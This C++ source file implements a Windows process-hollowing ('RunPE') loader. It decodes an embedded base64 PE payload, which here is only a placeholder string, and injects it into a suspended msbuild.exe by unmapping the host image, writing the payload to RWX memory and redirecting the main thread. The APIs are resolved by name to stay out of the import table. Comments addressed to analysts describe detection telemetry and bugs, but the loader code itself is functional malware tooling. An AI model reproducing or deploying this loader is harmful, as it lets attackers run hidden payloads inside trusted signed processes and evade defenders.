  1. #include <Windows.h>
  2. #include <iostream>
  3. #include <string>
  4.  
using namespace std;

// Standard base64 alphabet (RFC 4648 section 4, the non-URL-safe variant):
// index i holds the symbol for the 6-bit value i. The decoder below maps a
// symbol back to its value by searching this string.
const std::string base64_chars =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "abcdefghijklmnopqrstuvwxyz"
    "0123456789"
    "+/";
  10.  
// Reports whether `c` may appear in base64 input: the two symbol characters
// '+' and '/', or anything isalnum() accepts. Note that isalnum() consults
// the current C locale, so outside the "C" locale the set of accepted bytes
// can be wider than the 62 ASCII letters and digits.
bool is_base64(unsigned char c)
{
    if (c == '+' || c == '/')
        return true;
    return std::isalnum(c) != 0;
}
  15.  
  16.  
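// Returns the 6-bit value of `c` in the standard base64 alphabet
// (A-Z = 0..25, a-z = 26..51, 0-9 = 52..61, '+' = 62, '/' = 63), or -1 for
// any other byte, including '=' padding and NUL. Range tests are used instead
// of isalnum() so the classification does not depend on the process locale;
// like the rest of this file it assumes an ASCII-compatible character set.
static int base64_index(unsigned char c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

// Decodes `encoded_string` from standard base64 (RFC 4648 alphabet).
//
// Decoding stops at the first '=' or at the first byte outside the alphabet;
// everything before that point is decoded, so unpadded input and input with
// trailing junk are both accepted. A trailing partial group of 2 or 3 symbols
// yields 1 or 2 bytes; a lone leftover symbol is discarded. Returns the
// decoded bytes (which may include NUL) as a std::string; empty input gives
// an empty string.
//
// Fixes over the earlier revision: all sizes and indices stay in size_t (no
// size_t -> int / size_t -> unsigned char narrowing), and symbols are
// classified with a locale-independent lookup instead of isalnum(), which in
// a non-"C" locale could admit bytes outside the alphabet and then turn a
// failed find() (npos) into a bogus 0xFF sextet.
std::string base64_decode(std::string const& encoded_string) {
    std::string ret;
    // Upper bound on output size: 3 bytes per 4 input symbols.
    ret.reserve((encoded_string.size() / 4) * 3 + 2);

    unsigned char quad[4];   // 6-bit values of the group being assembled
    size_t n = 0;            // how many entries of quad[] are filled

    for (size_t pos = 0; pos < encoded_string.size(); ++pos) {
        const unsigned char c = static_cast<unsigned char>(encoded_string[pos]);
        if (c == '=') break;
        const int v = base64_index(c);
        if (v < 0) break;
        quad[n++] = static_cast<unsigned char>(v);
        if (n == 4) {
            // Four 6-bit values -> three 8-bit values.
            ret += static_cast<char>((quad[0] << 2) | (quad[1] >> 4));
            ret += static_cast<char>(((quad[1] & 0x0f) << 4) | (quad[2] >> 2));
            ret += static_cast<char>(((quad[2] & 0x03) << 6) | quad[3]);
            n = 0;
        }
    }

    // Partial trailing group: n symbols carry n-1 whole bytes.
    if (n > 1) {
        for (size_t k = n; k < 4; ++k) quad[k] = 0;
        ret += static_cast<char>((quad[0] << 2) | (quad[1] >> 4));
        if (n > 2)
            ret += static_cast<char>(((quad[1] & 0x0f) << 4) | (quad[2] >> 2));
    }
    return ret;
}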
  63.  
// Module and export names that RunPeEXE resolves at run time through
// GetProcAddress(GetModuleHandle(...)), each paired with a function-pointer
// typedef of the matching signature. Resolving by name keeps these APIs out
// of the binary's import table, but the names themselves are plain string
// literals and a static string scan of the compiled binary recovers them
// directly.
char kerDll[] = "kernel32.dll";

char kerCP[] = "CreateProcessA";
// CreateProcessA (kernel32): RunPeEXE calls it with CREATE_SUSPENDED.
typedef  BOOL(WINAPI *CreateProcessAA) (LPCTSTR, LPTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION);

char kerVAE[] = "VirtualAllocEx";
// VirtualAllocEx (kernel32): reserves and commits the payload image in the host process.
typedef LPVOID(WINAPI * VirtualAllocExA) (HANDLE, LPVOID, SIZE_T, DWORD, DWORD);

char ntDll[] = "ntdll.dll";

// The Nt* entries below are ntdll native-API exports, declared by hand because
// <Windows.h> does not provide prototypes for them. Each is typed as returning
// LONG (an NTSTATUS); RunPeEXE never checks those return values.
char ntRVM[] = "NtReadVirtualMemory";
typedef LONG(NTAPI * NtReadVirtualMemory) (HANDLE, PVOID, PVOID, ULONG, PULONG);

char ntWVM[] = "NtWriteVirtualMemory";
typedef LONG(NTAPI * NtWriteVirtualMemory) (HANDLE, PVOID, PVOID, ULONG, PULONG);


char ntUVOS[] = "NtUnmapViewOfSection";
typedef LONG(NTAPI * NtUnmapViewOfSection) (HANDLE, PVOID);

char ntGCT[] = "NtGetContextThread";
typedef LONG(NTAPI * NtGetContextThread) (HANDLE, PCONTEXT);

char ntSCT[] = "NtSetContextThread";
typedef LONG(NTAPI * NtSetContextThread) (HANDLE, PCONTEXT);

char ntRT[] = "NtResumeThread";
typedef LONG(NTAPI * NtResumeThread) (HANDLE);
  92.  
// Process-hollowing ("RunPE") loader. Starts the executable at `path` in a
// suspended state, replaces the host's mapped image with the PE image held in
// `buff`, points the main thread at the new image's entry point and resumes
// it. `buff` is expected to be a complete in-memory PE file (DOS header, NT
// headers, section table, and raw section data at their file offsets).
//
// Returns 1 on every path -- the early exits on a bad DOS signature or a
// failed API lookup and the fall-through after NtResumeThread alike -- so a
// caller cannot tell failure from completion. Only CreateProcessA's result is
// checked; every Nt* status is ignored. The context buffer and the
// process/thread handles in PI are never released.
//
// Notes for analysts: the call sequence CreateProcess(CREATE_SUSPENDED) ->
// NtGetContextThread -> NtReadVirtualMemory(PEB) -> NtUnmapViewOfSection ->
// VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> NtWriteVirtualMemory ->
// NtSetContextThread -> NtResumeThread is the canonical hollowing pattern that
// endpoint telemetry keys on. The use of the Ebx/Eax CONTEXT members means
// this code is written for 32-bit (x86) hosts only, and no relocation
// processing is done, so the payload must land at its preferred ImageBase.
// After it runs, the host's PEB.ImageBaseAddress no longer matches the module
// that was loaded from disk.
int RunPeEXE(void *buff, LPSTR path) {

    DWORD baseAddr;                     // host's current image base, read from its PEB
    LPVOID pEXE;                        // where the payload image is placed in the host
    PIMAGE_DOS_HEADER pDHeader;
    PIMAGE_NT_HEADERS pNtHeader;
    PIMAGE_SECTION_HEADER pSHeader;
    STARTUPINFO SI;
    PROCESS_INFORMATION PI;
    PCONTEXT ctx;                       // register state of the host's main thread

    // Function pointers filled in by run-time name lookup below.
    CreateProcessAA sCreateProcess;
    VirtualAllocExA sVirtualAllocEx;

    NtUnmapViewOfSection sNtUnmapViewOfSection;

    NtReadVirtualMemory sNtReadVirtualMemory;
    NtWriteVirtualMemory sNtWriteVirtualMemory;

    NtGetContextThread sNtGetContextThread;
    NtSetContextThread sNtSetContextThread;
    NtResumeThread sNtResumeThread;

    ZeroMemory(&SI, sizeof(SI));
    ZeroMemory(&PI, sizeof(PI));


    pDHeader = (PIMAGE_DOS_HEADER)buff;

    // The only validation of the payload: it must start with the "MZ" signature.
    if (pDHeader->e_magic != IMAGE_DOS_SIGNATURE)
    {
        return 1;
    }
    // NT headers sit at e_lfanew from the start of the image.
    pNtHeader = (PIMAGE_NT_HEADERS)((intptr_t)buff + pDHeader->e_lfanew);

    // Every API is looked up by name at run time rather than linked through
    // the import table (see the name/typedef pairs above).
    if ((sCreateProcess = CreateProcessAA(GetProcAddress(GetModuleHandle((LPCWSTR)kerDll), kerCP))) == 0)
    {
        return 1;
    }
    // Start the host suspended so its main thread has not run any user code yet.
    if (!sCreateProcess((LPCTSTR)path, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
    {
        return 1;
    }
    // Buffer for the thread context; allocated with VirtualAlloc and never freed.
    ctx = (PCONTEXT)VirtualAlloc(NULL, sizeof(ctx), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // CONTEXT_FULL covers the integer registers (Ebx, Eax) used below.
    ctx->ContextFlags = CONTEXT_FULL;
    if ((sNtGetContextThread = NtGetContextThread(GetProcAddress(GetModuleHandle((LPCWSTR)ntDll), ntGCT))) == 0)
    {
        return 1;
    }
    sNtGetContextThread(PI.hThread, (LPCONTEXT)ctx);

    if ((sNtReadVirtualMemory = NtReadVirtualMemory(GetProcAddress(GetModuleHandle((LPCWSTR)ntDll), ntRVM))) == 0)
    {
        return 1;
    }

    // For a freshly created x86 thread Ebx holds the PEB pointer; offset 8 is
    // PEB.ImageBaseAddress, i.e. where the host's own image is mapped.
    sNtReadVirtualMemory(PI.hProcess, PVOID(ctx->Ebx + 8), &baseAddr, sizeof(DWORD), NULL);

    // If the host already occupies the payload's preferred base, unmap it to
    // make room; otherwise the existing mapping is left in place.
    if ((DWORD)baseAddr == pNtHeader->OptionalHeader.ImageBase)
    {
        if ((sNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandle((LPCWSTR)ntDll), ntUVOS))) == 0)
        {
            return 1;
        }
        sNtUnmapViewOfSection(PI.hProcess, PVOID(baseAddr));
    }

    if ((sVirtualAllocEx = VirtualAllocExA(GetProcAddress(GetModuleHandle((LPCWSTR)kerDll), kerVAE))) == 0)
    {
        return 1;
    }

    // One RWX region for the whole payload image at its preferred base; the
    // result is not checked for NULL before use.
    pEXE = sVirtualAllocEx(PI.hProcess, (LPVOID)pNtHeader->OptionalHeader.ImageBase, pNtHeader->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if ((sNtWriteVirtualMemory = NtWriteVirtualMemory(GetProcAddress(GetModuleHandle((LPCWSTR)ntDll), ntWVM))) == 0)
    {
        return 1;
    }
    // Copy the PE headers, then each section's raw data to its virtual address.
    sNtWriteVirtualMemory(PI.hProcess, (PVOID)pEXE, buff, pNtHeader->OptionalHeader.SizeOfHeaders, NULL);

    for (int i = 0; i < pNtHeader->FileHeader.NumberOfSections; i++)
    {
        pSHeader = (PIMAGE_SECTION_HEADER)((intptr_t)buff + pDHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * i);
        sNtWriteVirtualMemory(PI.hProcess, (PVOID)((DWORD)pEXE + pSHeader->VirtualAddress), (PWCHAR)buff + pSHeader->PointerToRawData, pSHeader->SizeOfRawData, NULL);
    }

    // Rewrite PEB.ImageBaseAddress to the payload's base and redirect the
    // thread's start address (Eax on x86) to the payload's entry point.
    sNtWriteVirtualMemory(PI.hProcess, (LPVOID)(ctx->Ebx + 8), (LPVOID)&pNtHeader->OptionalHeader.ImageBase, sizeof(DWORD), NULL);
    ctx->Eax = (DWORD)pEXE + pNtHeader->OptionalHeader.AddressOfEntryPoint;

    if ((sNtSetContextThread = NtSetContextThread(GetProcAddress(GetModuleHandle((LPCWSTR)ntDll), ntSCT))) == 0)
    {
        return 1;
    }

    sNtSetContextThread(PI.hThread, LPCONTEXT(ctx));

    if ((sNtResumeThread = NtResumeThread(GetProcAddress(GetModuleHandle((LPCWSTR)ntDll), ntRT))) == 0)
    {
        return 1;
    }

    // Resume the host; from here on it executes the payload image.
    sNtResumeThread(PI.hThread);

    // Same value as the error exits above -- success is not distinguishable.
    return 1;
}
  199.  
// Entry point. Builds the host-process path under %windir%, decodes the
// embedded base64 payload and hands both to RunPeEXE.
//
// Notes for analysts: the host chosen here is a signed Microsoft binary
// (msbuild.exe from the .NET 2.0 framework directory; calc.exe is the
// commented-out alternative). Once hollowed, that process executes an image
// that does not match its on-disk file, which is the observable artefact.
int main()
{

    // getenv() returns a pointer into the process's own environment storage;
    // the strcat() below appends to that storage in place, not to a copy.
    LPSTR injectPath = getenv("windir");
    //strcat(injectPath, "\\system32\\calc.exe"); for Native
    //strcat(injectPath, "\\Microsoft.NET\\Framework\\v2.0.50727\\msbuild.exe"); for .NET
    strcat(injectPath, "\\Microsoft.NET\\Framework\\v2.0.50727\\msbuild.exe");
    // Placeholder literal: a deployed build would carry the base64-encoded PE
    // payload here.
    std::string b64Str = "Base64String";
    // Decoded payload bytes, handed to RunPeEXE as the in-memory PE image.
    unsigned char * bBin = (unsigned char*)base64_decode(b64Str).c_str();
    // RunPeEXE's return value is 1 on every path and is not inspected here.
    RunPeEXE((void*)bBin, injectPath);
    return 0;

    // Unreachable: the function has already returned above.

    return 0;
}